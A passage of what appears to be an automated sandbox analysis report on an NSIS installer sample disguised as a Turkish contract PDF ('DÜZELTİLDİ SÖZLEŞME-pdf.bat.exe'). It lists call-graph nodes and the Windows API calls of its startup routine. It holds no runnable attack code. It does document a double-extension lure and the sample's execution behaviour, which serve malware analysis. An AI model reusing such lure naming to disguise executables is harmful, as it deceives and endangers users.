701d10a9 GlobalSize 5661->5662 5663 701d10b2 5661->5663 5662->5663 5664 701d10c7 5663->5664 5665 701d10b6 GlobalAlloc 5663->5665 5667 701d10d2 GlobalFree 5664->5667 5666 701d15dd 3 API calls 5665->5666 5666->5664 5667->5656 5668 401d86 5669 401d99 GetDlgItem 5668->5669 5670 401d8c 5668->5670 5672 401d93 5669->5672 5671 402d89 21 API calls 5670->5671 5671->5672 5673 401dda GetClientRect LoadImageW SendMessageW 5672->5673 5674 402dab 21 API calls 5672->5674 5676 401e38 5673->5676 5678 401e44 5673->5678 5674->5673 5677 401e3d DeleteObject 5676->5677 5676->5678 5677->5678 5679 402388 5680 40238f 5679->5680 5682 4023a2 5679->5682 5681 40655e 21 API calls 5680->5681 5683 40239c 5681->5683 5683->5682 5684 405b81 MessageBoxIndirectW 5683->5684 5684->5682 5685 402c0a SendMessageW 5686 402c24 InvalidateRect 5685->5686 5687 402c2f 5685->5687 5686->5687 5695 404f0d GetDlgItem GetDlgItem 5696 404f5f 7 API calls 5695->5696 5709 405184 5695->5709 5697 405006 DeleteObject 5696->5697 5698 404ff9 SendMessageW 5696->5698 5699 40500f 5697->5699 5698->5697 5700 405046 5699->5700 5704 40655e 21 API calls 5699->5704 5702 4044a0 22 API calls 5700->5702 5701 405266 5703 405312 5701->5703 5706 405177 5701->5706 5713 4052bf SendMessageW 5701->5713 5705 40505a 5702->5705 5707 405324 5703->5707 5708 40531c SendMessageW 5703->5708 5710 405028 SendMessageW SendMessageW 5704->5710 5712 4044a0 22 API calls 5705->5712 5715 404507 8 API calls 5706->5715 5716 405336 ImageList_Destroy 5707->5716 5717 40533d 5707->5717 5724 40534d 5707->5724 5708->5707 5709->5701 5729 4051f3 5709->5729 5749 404e5b SendMessageW 5709->5749 5710->5699 5730 40506b 5712->5730 5713->5706 5719 4052d4 SendMessageW 5713->5719 5714 405258 SendMessageW 5714->5701 5720 405513 5715->5720 5716->5717 5721 405346 GlobalFree 5717->5721 5717->5724 5718 4054c7 5718->5706 5725 4054d9 ShowWindow GetDlgItem ShowWindow 5718->5725 5723 4052e7 5719->5723 5721->5724 5722 405146 GetWindowLongW SetWindowLongW 5726 40515f 5722->5726 5734 4052f8 SendMessageW 5723->5734 5724->5718 5741 405388 5724->5741 5754 404edb 5724->5754 5725->5706 5727 405164 ShowWindow 5726->5727 5728 40517c 5726->5728 5747 4044d5 SendMessageW 5727->5747 5748 4044d5 SendMessageW 5728->5748 5729->5701 5729->5714 5730->5722 5733 4050be SendMessageW 5730->5733 5735 405141 5730->5735 5737 405110 SendMessageW 5730->5737 5738 4050fc SendMessageW 5730->5738 5733->5730 5734->5703 5735->5722 5735->5726 5736 4053cc 5740 405492 5736->5740 5745 405440 SendMessageW SendMessageW 5736->5745 5737->5730 5738->5730 5742 40549d InvalidateRect 5740->5742 5744 4054a9 5740->5744 5741->5736 5743 4053b6 SendMessageW 5741->5743 5742->5744 5743->5736 5744->5718 5763 404e16 5744->5763 5745->5736 5747->5706 5748->5709 5750 404eba SendMessageW 5749->5750 5751 404e7e GetMessagePos ScreenToClient SendMessageW 5749->5751 5752 404eb2 5750->5752 5751->5752 5753 404eb7 5751->5753 5752->5729 5753->5750 5766 406521 lstrcpynW 5754->5766 5756 404eee 5767 406468 wsprintfW 5756->5767 5758 404ef8 5759 40140b 2 API calls 5758->5759 5760 404f01 5759->5760 5768 406521 lstrcpynW 5760->5768 5762 404f08 5762->5741 5769 404d4d 5763->5769 5765 404e2b 5765->5718 5766->5756 5767->5758 5768->5762 5770 404d66 5769->5770 5771 40655e 21 API calls 5770->5771 5772 404dca 5771->5772 5773 40655e 21 API calls 5772->5773 5774 404dd5 5773->5774 5775 40655e 21 API calls 5774->5775 5776 404deb lstrlenW wsprintfW SetDlgItemTextW 5775->5776 5776->5765 5777 40248f 5778 402dab 21 API calls 5777->5778 5779 4024a1 5778->5779 5780 402dab 21 API calls 5779->5780 5781 4024ab 5780->5781 5794 402e3b 5781->5794 5783 402c2f 5785 4024e3 5786 4024ef 5785->5786 5789 402d89 21 API calls 5785->5789 5790 40250e RegSetValueExW 5786->5790 5791 4032b9 39 API calls 5786->5791 5787 402dab 21 API calls 5788 4024d9 lstrlenW 5787->5788 5788->5785 5789->5786 5792 402524 RegCloseKey 5790->5792 5791->5790 5792->5783 5795 402e56 5794->5795 5798 4063bc 5795->5798 5799 4063cb 5798->5799 5800 4024bb 5799->5800 5801 4063d6 RegCreateKeyExW 5799->5801 5800->5783 5800->5785 5800->5787 5801->5800 5802 404610 lstrlenW 5803 404631 WideCharToMultiByte 5802->5803 5804 40462f 5802->5804 5804->5803 5805 402910 5806 402dab 21 API calls 5805->5806 5807 402917 FindFirstFileW 5806->5807 5808 40292a 5807->5808 5809 40293f 5807->5809 5811 402948 5809->5811 5813 406468 wsprintfW 5809->5813 5814 406521 lstrcpynW 5811->5814 5813->5811 5814->5808 5815 401911 5816 401948 5815->5816 5817 402dab 21 API calls 5816->5817 5818 40194d 5817->5818 5819 405c2d 71 API calls 5818->5819 5820 401956 5819->5820 5821 401491 5822 4055a6 28 API calls 5821->5822 5823 401498 5822->5823 5824 404991 5825 4049bd 5824->5825 5826 4049ce 5824->5826 5885 405b65 GetDlgItemTextW 5825->5885 5828 4049da GetDlgItem 5826->5828 5835 404a39 5826->5835 5831 4049ee 5828->5831 5829 404b1d 5834 404ccc 5829->5834 5887 405b65 GetDlgItemTextW 5829->5887 5830 4049c8 5832 4067cf 5 API calls 5830->5832 5833 404a02 SetWindowTextW 5831->5833 5838 405e9b 4 API calls 5831->5838 5832->5826 5839 4044a0 22 API calls 5833->5839 5837 404507 8 API calls 5834->5837 5835->5829 5835->5834 5840 40655e 21 API calls 5835->5840 5842 404ce0 5837->5842 5843 4049f8 5838->5843 5844 404a1e 5839->5844 5845 404aad SHBrowseForFolderW 5840->5845 5841 404b4d 5846 405ef8 18 API calls 5841->5846 5843->5833 5850 405df0 3 API calls 5843->5850 5847 4044a0 22 API calls 5844->5847 5845->5829 5848 404ac5 CoTaskMemFree 5845->5848 5849 404b53 5846->5849 5851 404a2c 5847->5851 5852 405df0 3 API calls 5848->5852 5888 406521 lstrcpynW 5849->5888 5850->5833 5886 4044d5 SendMessageW 5851->5886 5854 404ad2 5852->5854 5857 404b09 SetDlgItemTextW 5854->5857 5861 40655e 21 API calls 5854->5861 5856 404a32 5859 406915 5 API calls 5856->5859 5857->5829 5858 404b6a 5860 406915 5 API calls 5858->5860 5859->5835 5867 404b71 5860->5867 5863 404af1 lstrcmpiW 5861->5863 5862 404bb2 5889 406521 lstrcpynW 5862->5889 5863->5857 5864 404b02 lstrcatW 5863->5864 5864->5857 5866 404bb9 5868 405e9b 4 API calls 5866->5868 5867->5862 5872 405e3c 2 API calls 5867->5872 5873 404c0a 5867->5873 5869 404bbf GetDiskFreeSpaceW 5868->5869 5871 404be3 MulDiv 5869->5871 5869->5873 5871->5873 5872->5867 5874 404c7b 5873->5874 5876 404e16 24 API calls 5873->5876 5875 404c9e 5874->5875 5877 40140b 2 API calls 5874->5877 5890 4044c2 KiUserCallbackDispatcher 5875->5890 5878 404c68 5876->5878 5877->5875 5880 404c7d SetDlgItemTextW 5878->5880 5881 404c6d 5878->5881 5880->5874 5883 404d4d 24 API calls 5881->5883 5882 404cba 5882->5834 5884 4048ea SendMessageW 5882->5884 5883->5874 5884->5834 5885->5830 5886->5856 5887->5841 5888->5858 5889->5866 5890->5882 5891 401914 5892 402dab 21 API calls 5891->5892 5893 40191b 5892->5893 5894 405b81 MessageBoxIndirectW 5893->5894 5895 401924 5894->5895 4815 402896 4816 40289d 4815->4816 4818 402bae 4815->4818 4817 402d89 21 API calls 4816->4817 4819 4028a4 4817->4819 4820 4028b3 SetFilePointer 4819->4820 4820->4818 4821 4028c3 4820->4821 4823 406468 wsprintfW 4821->4823 4823->4818 5896 401f17 5897 402dab 21 API calls 5896->5897 5898 401f1d 5897->5898 5899 402dab 21 API calls 5898->5899 5900 401f26 5899->5900 5901 402dab 21 API calls 5900->5901 5902 401f2f 5901->5902 5903 402dab 21 API calls 5902->5903 5904 401f38 5903->5904 5905 401423 28 API calls 5904->5905 5906 401f3f 5905->5906 5913 405b47 ShellExecuteExW 5906->5913 5908 401f87 5910 402933 5908->5910 5914 4069c0 WaitForSingleObject 5908->5914 5911 401fa4 CloseHandle 5911->5910 5913->5908 5915 4069da 5914->5915 5916 4069ec GetExitCodeProcess 5915->5916 5917 406951 2 API calls 5915->5917 5916->5911 5918 4069e1 WaitForSingleObject 5917->5918 5918->5915 5919 402f98 5920 402fc3 5919->5920 5921 402faa SetTimer 5919->5921 5922 403018 5920->5922 5923 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5920->5923 5921->5920 5923->5922 5924 40551a 5925 40552a 5924->5925 5926 40553e 5924->5926 5927 405530 5925->5927 5928 405587 5925->5928 5929 405546 IsWindowVisible 5926->5929 5935 40555d 5926->5935 5931 4044ec SendMessageW 5927->5931 5930 40558c CallWindowProcW 5928->5930 5929->5928 5932 405553 5929->5932 5933 40553a 5930->5933 5931->5933 5934 404e5b 5 API calls 5932->5934 5934->5935 5935->5930 5936 404edb 4 API calls 5935->5936 5936->5928 5937 401d1c 5938 402d89 21 API calls 5937->5938 5939 401d22 IsWindow 5938->5939 5940 401a25 5939->5940 5941 701d2d43 5942 701d2d5b 5941->5942 5943 701d162f 2 API calls 5942->5943 5944 701d2d76 5943->5944 5945 40149e 5946 4023a2 5945->5946 5947 4014ac PostQuitMessage 5945->5947 5947->5946 4222 401ba0 4223 401bf1 4222->4223 4224 401bad 4222->4224 4226 401bf6 4223->4226 4227 401c1b GlobalAlloc 4223->4227 4225 401c36 4224->4225 4231 401bc4 4224->4231 4228 40655e 21 API calls 4225->4228 4235 4023a2 4225->4235 4226->4235 4260 406521 lstrcpynW 4226->4260 4241 40655e 4227->4241 4230 40239c 4228->4230 4230->4235 4261 405b81 4230->4261 4258 406521 lstrcpynW 4231->4258 4234 401c08 GlobalFree 4234->4235 4236 401bd3 4259 406521 lstrcpynW 4236->4259 4239 401be2 4265 406521 lstrcpynW 4239->4265 4256 406569 4241->4256 4242 4067b0 4243 4067c9 4242->4243 4288 406521 lstrcpynW 4242->4288 4243->4225 4245 406781 lstrlenW 4245->4256 4249 40667a GetSystemDirectoryW 4249->4256 4250 40655e 15 API calls 4250->4245 4251 406690 GetWindowsDirectoryW 4251->4256 4252 40655e 15 API calls 4252->4256 4253 406722 lstrcatW 4253->4256 4256->4242 4256->4245 4256->4249 4256->4250 4256->4251 4256->4252 4256->4253 4257 4066f2 SHGetPathFromIDListW CoTaskMemFree 4256->4257 4266 4063ef 4256->4266 4271 406915 GetModuleHandleA 4256->4271 4277 4067cf 4256->4277 4286 406468 wsprintfW 4256->4286 4287 406521 lstrcpynW 4256->4287 4257->4256 4258->4236 4259->4239 4260->4234 4262 405b96 4261->4262 4263 405be2 4262->4263 4264 405baa MessageBoxIndirectW 4262->4264 4263->4235 4264->4263 4265->4235 4289 40638e 4266->4289 4269 406423 RegQueryValueExW RegCloseKey 4270 406453 4269->4270 4270->4256 4272 406931 4271->4272 4273 40693b GetProcAddress 4271->4273 4293 4068a5 GetSystemDirectoryW 4272->4293 4275 40694a 4273->4275 4275->4256 4276 406937 4276->4273 4276->4275 4278 4067dc 4277->4278 4280 406845 CharNextW 4278->4280 4281 406852 4278->4281 4284 406831 CharNextW 4278->4284 4285 406840 CharNextW 4278->4285 4296 405e1d 4278->4296 4279 406857 CharPrevW 4279->4281 4280->4278 4280->4281 4281->4279 4282 406878 4281->4282 4282->4256 4284->4278 4285->4280 4286->4256 4287->4256 4288->4243 4290 40639d 4289->4290 4291 4063a6 RegOpenKeyExW 4290->4291 4292 4063a1 4290->4292 4291->4292 4292->4269 4292->4270 4294 4068c7 wsprintfW LoadLibraryExW 4293->4294 4294->4276 4297 405e23 4296->4297 4298 405e39 4297->4298 4299 405e2a CharNextW 4297->4299 4298->4278 4299->4297 4316 403fa1 4317 403fb9 4316->4317 4318 40411a 4316->4318 4317->4318 4319 403fc5 4317->4319 4320 40416b 4318->4320 4321 40412b GetDlgItem GetDlgItem 4318->4321 4322 403fd0 SetWindowPos 4319->4322 4323 403fe3 4319->4323 4325 4041c5 4320->4325 4330 401389 2 API calls 4320->4330 4324 4044a0 22 API calls 4321->4324 4322->4323 4327 403fec ShowWindow 4323->4327 4328 40402e 4323->4328 4329 404155 SetClassLongW 4324->4329 4343 404115 4325->4343 4389 4044ec 4325->4389 4331 404107 4327->4331 4332 40400c GetWindowLongW 4327->4332 4333 404036 DestroyWindow 4328->4333 4334 40404d 4328->4334 4335 40140b 2 API calls 4329->4335 4336 40419d 4330->4336 4411 404507 4331->4411 4332->4331 4338 404025 ShowWindow 4332->4338 4388 404429 4333->4388 4339 404052 SetWindowLongW 4334->4339 4340 404063 4334->4340 4335->4320 4336->4325 4342 4041a1 SendMessageW 4336->4342 4338->4328 4339->4343 4340->4331 4341 40406f GetDlgItem 4340->4341 4346 404080 SendMessageW IsWindowEnabled 4341->4346 4347 40409d 4341->4347 4342->4343 4344 40140b 2 API calls 4354 4041d7 4344->4354 4345 40442b DestroyWindow EndDialog 4345->4388 4346->4343 4346->4347 4350 4040aa 4347->4350 4351 4040f1 SendMessageW 4347->4351 4352 4040bd 4347->4352 4362 4040a2 4347->4362 4348 40445a ShowWindow 4348->4343 4349 40655e 21 API calls 4349->4354 4350->4351 4350->4362 4351->4331 4355 4040c5 4352->4355 4356 4040da 4352->4356 4354->4343 4354->4344 4354->4345 4354->4349 4358 4044a0 22 API calls 4354->4358 4379 40436b DestroyWindow 4354->4379 4392 4044a0 4354->4392 4405 40140b 4355->4405 4359 40140b 2 API calls 4356->4359 4357 4040d8 4357->4331 4358->4354 4361 4040e1 4359->4361 4361->4331 4361->4362 4408 404479 4362->4408 4364 404252 GetDlgItem 4365 404267 4364->4365 4366 40426f ShowWindow KiUserCallbackDispatcher 4364->4366 4365->4366 4395 4044c2 KiUserCallbackDispatcher 4366->4395 4368 404299 EnableWindow 4373 4042ad 4368->4373 4369 4042b2 GetSystemMenu EnableMenuItem SendMessageW 4370 4042e2 SendMessageW 4369->4370 4369->4373 4370->4373 4373->4369 4396 4044d5 SendMessageW 4373->4396 4397 403f82 4373->4397 4400 406521 lstrcpynW 4373->4400 4375 404311 lstrlenW 4376 40655e 21 API calls 4375->4376 4377 404327 SetWindowTextW 4376->4377 4401 401389 4377->4401 4380 404385 CreateDialogParamW 4379->4380 4379->4388 4381 4043b8 4380->4381 4380->4388 4382 4044a0 22 API calls 4381->4382 4383 4043c3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4382->4383 4384 401389 2 API calls 4383->4384 4385 404409 4384->4385 4385->4343 4386 404411 ShowWindow 4385->4386 4387 4044ec SendMessageW 4386->4387 4387->4388 4388->4343 4388->4348 4390 404504 4389->4390 4391 4044f5 SendMessageW 4389->4391 4390->4354 4391->4390 4393 40655e 21 API calls 4392->4393 4394 4044ab SetDlgItemTextW 4393->4394 4394->4364 4395->4368 4396->4373 4398 40655e 21 API calls 4397->4398 4399 403f90 SetWindowTextW 4398->4399 4399->4373 4400->4375 4403 401390 4401->4403 4402 4013fe 4402->4354 4403->4402 4404 4013cb MulDiv SendMessageW 4403->4404 4404->4403 4406 401389 2 API calls 4405->4406 4407 401420 4406->4407 4407->4362 4409 404480 4408->4409 4410 404486 SendMessageW 4408->4410 4409->4410 4410->4357 4412 40451f GetWindowLongW 4411->4412 4413 4045ca 4411->4413 4412->4413 4414 404534 4412->4414 4413->4343 4414->4413 4415 404561 GetSysColor 4414->4415 4416 404564 4414->4416 4415->4416 4417 404574 SetBkMode 4416->4417 4418 40456a SetTextColor 4416->4418 4419 404592 4417->4419 4420 40458c GetSysColor 4417->4420 4418->4417 4421 4045a3 4419->4421 4422 404599 SetBkColor 4419->4422 4420->4419 4421->4413 4423 4045b6 DeleteObject 4421->4423 4424 4045bd CreateBrushIndirect 4421->4424 4422->4421 4423->4424 4424->4413 5948 402621 5949 402dab 21 API calls 5948->5949 5950 402628 5949->5950 5953 406011 GetFileAttributesW CreateFileW 5950->5953 5952 402634 5953->5952 4425 701d2a7f 4426 701d2acf 4425->4426 4427 701d2a8f VirtualProtect 4425->4427 4427->4426 4439 4025a3 4451 402deb 4439->4451 4442 402d89 21 API calls 4443 4025b6 4442->4443 4444 4025c5 4443->4444 4449 402933 4443->4449 4445 4025d2 RegEnumKeyW 4444->4445 4446 4025de RegEnumValueW 4444->4446 4447 4025fa RegCloseKey 4445->4447 4446->4447 4448 4025f3 4446->4448 4447->4449 4448->4447 4452 402dab 21 API calls 4451->4452 4453 402e02 4452->4453 4454 40638e RegOpenKeyExW 4453->4454 4455 4025ad 4454->4455 4455->4442 5961 701d1979 5962 701d199c 5961->5962 5963 701d19d1 GlobalFree 5962->5963 5964 701d19e3 5962->5964 5963->5964 5965 701d1312 2 API calls 5964->5965 5966 701d1b6e GlobalFree GlobalFree 5965->5966 4701 4015a8 4702 402dab 21 API calls 4701->4702 4703 4015af SetFileAttributesW 4702->4703 4704 4015c1 4703->4704 5967 701d1774 5968 701d17a3 5967->5968 5969 701d1bff 22 API calls 5968->5969 5970 701d17aa 5969->5970 5971 701d17bd 5970->5971 5972 701d17b1 5970->5972 5974 701d17e4 5971->5974 5975 701d17c7 5971->5975 5973 701d1312 2 API calls 5972->5973 5976 701d17bb 5973->5976 5978 701d180e 5974->5978 5979 701d17ea 5974->5979 5977 701d15dd 3 API calls 5975->5977 5981 701d17cc 5977->5981 5980 701d15dd 3 API calls 5978->5980 5982 701d1654 3 API calls 5979->5982 5980->5976 5983 701d1654 3 API calls 5981->5983 5984 701d17ef 5982->5984 5985 701d17d2 5983->5985 5986 701d1312 2 API calls 5984->5986 5988 701d1312 2 API calls 5985->5988 5987 701d17f5 GlobalFree 5986->5987 5987->5976 5989 701d1809 GlobalFree 5987->5989 5990 701d17d8 GlobalFree 5988->5990 5989->5976 5990->5976 5991 401fa9 5992 402dab 21 API calls 5991->5992 5993 401faf 5992->5993 5994 4055a6 28 API calls 5993->5994 5995 401fb9 5994->5995 5996 405b04 2 API calls 5995->5996 5997 401fbf 5996->5997 5998 402933 5997->5998 5999 4069c0 5 API calls 5997->5999 6002 401fe2 CloseHandle 5997->6002 6001 401fd4 5999->6001 6001->6002 6004 406468 wsprintfW 6001->6004 6002->5998 6004->6002 4705 40252f 4706 402deb 21 API calls 4705->4706 4707 402539 4706->4707 4708 402dab 21 API calls 4707->4708 4709 402542 4708->4709 4710 402933 4709->4710 4711 40254d RegQueryValueExW 4709->4711 4712 40256d 4711->4712 4715 402573 RegCloseKey 4711->4715 4712->4715 4716 406468 wsprintfW 4712->4716 4715->4710 4716->4715 6005 40202f 6006 402dab 21 API calls 6005->6006 6007 402036 6006->6007 6008 406915 5 API calls 6007->6008 6009 402045 6008->6009 6010 402061 GlobalAlloc 6009->6010 6012 4020d1 6009->6012 6011 402075 6010->6011 6010->6012 6013 406915 5 API calls 6011->6013 6014 40207c 6013->6014 6015 406915 5 API calls 6014->6015 6016 402086 6015->6016 6016->6012 6020 406468 wsprintfW 6016->6020 6018 4020bf 6021 406468 wsprintfW 6018->6021 6020->6018 6021->6012 6022 4021af 6023 402dab 21 API calls 6022->6023 6024 4021b6 6023->6024 6025 402dab 21 API calls 6024->6025 6026 4021c0 6025->6026 6027 402dab 21 API calls 6026->6027 6028 4021ca 6027->6028 6029 402dab 21 API calls 6028->6029 6030 4021d4 6029->6030 6031 402dab 21 API calls 6030->6031 6032 4021de 6031->6032 6033 40221d CoCreateInstance 6032->6033 6034 402dab 21 API calls 6032->6034 6037 40223c 6033->6037 6034->6033 6035 401423 28 API calls 6036 4022fb 6035->6036 6037->6035 6037->6036 6038 403bb1 6039 403bbc 6038->6039 6040 403bc3 GlobalAlloc 6039->6040 6041 403bc0 6039->6041 6040->6041 6049 701d23e9 6050 701d2453 6049->6050 6051 701d245e GlobalAlloc 6050->6051 6052 701d247d 6050->6052 6051->6050 6053 401a35 6054 402dab 21 API calls 6053->6054 6055 401a3e ExpandEnvironmentStringsW 6054->6055 6056 401a52 6055->6056 6058 401a65 6055->6058 6057 401a57 lstrcmpW 6056->6057 6056->6058 6057->6058 6064 4023b7 6065 4023c5 6064->6065 6066 4023bf 6064->6066 6068 402dab 21 API calls 6065->6068 6070 4023d3 6065->6070 6067 402dab 21 API calls 6066->6067 6067->6065 6068->6070 6069 4023e1 6072 402dab 21 API calls 6069->6072 6070->6069 6071 402dab 21 API calls 6070->6071 6071->6069 6073 4023ea WritePrivateProfileStringW 6072->6073 6074 4014b8 6075 4014be 6074->6075 6076 401389 2 API calls 6075->6076 6077 4014c6 6076->6077 4829 402439 4830 402441 4829->4830 4831 40246c 4829->4831 4833 402deb 21 API calls 4830->4833 4832 402dab 21 API calls 4831->4832 4834 402473 4832->4834 4835 402448 4833->4835 4841 402e69 4834->4841 4837 402452 4835->4837 4838 402480 4835->4838 4839 402dab 21 API calls 4837->4839 4840 402459 RegDeleteValueW RegCloseKey 4839->4840 4840->4838 4842 402e76 4841->4842 4843 402e7d 4841->4843 4842->4838 4843->4842 4845 402eae 4843->4845 4846 40638e RegOpenKeyExW 4845->4846 4847 402edc 4846->4847 4848 402f91 4847->4848 4849 402ee6 4847->4849 4848->4842 4850 402eec RegEnumValueW 4849->4850 4855 402f0f 4849->4855 4851 402f76 RegCloseKey 4850->4851 4850->4855 4851->4848 4852 402f4b RegEnumKeyW 4853 402f54 RegCloseKey 4852->4853 4852->4855 4854 406915 5 API calls 4853->4854 4856 402f64 4854->4856 4855->4851 4855->4852 4855->4853 4857 402eae 6 API calls 4855->4857 4858 402f86 4856->4858 4859 402f68 RegDeleteKeyW 4856->4859 4857->4855 4858->4848 4859->4848 4860 40173a 4861 402dab 21 API calls 4860->4861 4862 401741 SearchPathW 4861->4862 4863 40175c 4862->4863 6078 701d10e1 6088 701d1111 6078->6088 6079 701d12b0 GlobalFree 6080 701d1240 GlobalFree 6080->6088 6081 701d11d7 GlobalAlloc 6081->6088 6082 701d12ab 6082->6079 6083 701d135a 2 API calls 6083->6088 6084 701d1312 2 API calls 6084->6088 6085 701d129a GlobalFree 6085->6088 6086 701d1381 lstrcpyW 6086->6088 6087 701d116b GlobalAlloc 6087->6088 6088->6079 6088->6080 6088->6081 6088->6082 6088->6083 6088->6084 6088->6085 6088->6086 6088->6087 6089 401d3d 6090 402d89 21 API calls 6089->6090 6091 401d44 6090->6091 6092 402d89 21 API calls 6091->6092 6093 401d50 GetDlgItem 6092->6093 6094 40263d 6093->6094 6095 406c3f 6097 406ac3 6095->6097 6096 40742e 6097->6096 6098 406b44 GlobalFree 6097->6098 6099 406b4d GlobalAlloc 6097->6099 6100 406bc4 GlobalAlloc 6097->6100 6101 406bbb GlobalFree 6097->6101 6098->6099 6099->6096 6099->6097 6100->6096 6100->6097 6101->6100

                              Executed Functions

                              Function 004034FC Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 464stringfilecomCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 4034fc-40354e SetErrorMode GetVersionExW 1 403550-403580 GetVersionExW 0->1 2 403588-40358d 0->2 1->2 3 403595-4035d7 2->3 4 40358f 2->4 5 4035d9-4035e1 call 406915 3->5 6 4035ea 3->6 4->3 5->6 11 4035e3 5->11 8 4035ef-403603 call 4068a5 lstrlenA 6->8 13 403605-403621 call 406915 * 3 8->13 11->6 20 403632-403696 #17 OleInitialize SHGetFileInfoW call 406521 GetCommandLineW call 406521 13->20 21 403623-403629 13->21 28 403698-40369a 20->28 29 40369f-4036b3 call 405e1d CharNextW 20->29 21->20 25 40362b 21->25 25->20 28->29 32 4037ae-4037b4 29->32 33 4036b8-4036be 32->33 34 4037ba 32->34 35 4036c0-4036c5 33->35 36 4036c7-4036ce 33->36 37 4037ce-4037e8 GetTempPathW call 4034cb 34->37 35->35 35->36 38 4036d0-4036d5 36->38 39 4036d6-4036da 36->39 47 403840-40385a DeleteFileW call 403082 37->47 48 4037ea-403808 GetWindowsDirectoryW lstrcatW call 4034cb 37->48 38->39 41 4036e0-4036e6 39->41 42 40379b-4037aa call 405e1d 39->42 45 403700-403739 41->45 46 4036e8-4036ef 41->46 42->32 58 4037ac-4037ad 42->58 53 403756-403790 45->53 54 40373b-403740 45->54 51 4036f1-4036f4 46->51 52 4036f6 46->52 64 403860-403866 47->64 65 403a47-403a57 call 403b19 OleUninitialize 47->65 48->47 62 40380a-40383a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034cb 48->62 51->45 51->52 52->45 56 403792-403796 53->56 57 403798-40379a 53->57 54->53 60 403742-40374a 54->60 56->57 63 4037bc-4037c9 call 406521 56->63 57->42 58->32 66 403751 60->66 67 40374c-40374f 60->67 62->47 62->65 63->37 70 40386c-403877 call 405e1d 64->70 71 4038ff-403906 call 403bf3 64->71 77 403a59-403a69 call 405b81 ExitProcess 65->77 78 403a7d-403a83 65->78 66->53 67->53 67->66 82 4038c5-4038cf 70->82 83 403879-4038ae 70->83 80 40390b-40390f 71->80 84 403b01-403b09 78->84 85 403a85-403a9b GetCurrentProcess OpenProcessToken 78->85 80->65 86 4038d1-4038df call 405ef8 82->86 87 403914-40393a call 405aec lstrlenW call 406521 82->87 91 4038b0-4038b4 83->91 88 403b0b 84->88 89 403b0f-403b13 ExitProcess 84->89 92 403ad1-403adf call 406915 85->92 93 403a9d-403acb LookupPrivilegeValueW AdjustTokenPrivileges 85->93 86->65 105 4038e5-4038fb call 406521 * 2 86->105 110 40394b-403963 87->110 111 40393c-403946 call 406521 87->111 88->89 96 4038b6-4038bb 91->96 97 4038bd-4038c1 91->97 103 403ae1-403aeb 92->103 104 403aed-403af8 ExitWindowsEx 92->104 93->92 96->97 101 4038c3 96->101 97->91 97->101 101->82 103->104 107 403afa-403afc call 40140b 103->107 104->84 104->107 105->71 107->84 116 403968-40396c 110->116 111->110 118 403971-40399b wsprintfW call 40655e 116->118 122 4039a4 call 405acf 118->122 123 40399d-4039a2 call 405a75 118->123 127 4039a9-4039ab 122->127 123->127 128 4039e7-403a06 SetCurrentDirectoryW call 4062e1 CopyFileW 127->128 129 4039ad-4039b7 GetFileAttributesW 127->129 137 403a45 128->137 138 403a08-403a29 call 4062e1 call 40655e call 405b04 128->138 131 4039d8-4039e3 129->131 132 4039b9-4039c2 DeleteFileW 129->132 131->116 133 4039e5 131->133 132->131 135 4039c4-4039d6 call 405c2d 132->135 133->65 135->118 135->131 137->65 146 403a2b-403a35 138->146 147 403a6f-403a7b CloseHandle 138->147 146->137 148 403a37-403a3f call 40687e 146->148 147->137 148->118 148->137
                              APIs
                              • SetErrorMode.KERNELBASE ref: 0040351F
                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040354A
                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040355D
                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 004035F6
                              • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403633
                              • OleInitialize.OLE32(00000000), ref: 0040363A
                              • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403659
                              • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040366E
                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe",00000020,"C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036A7
                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037DF
                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037F0
                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FC
                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403818
                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403829
                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403831
                              • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403845
                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040391E
                                • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                              • wsprintfW.USER32 ref: 0040397B
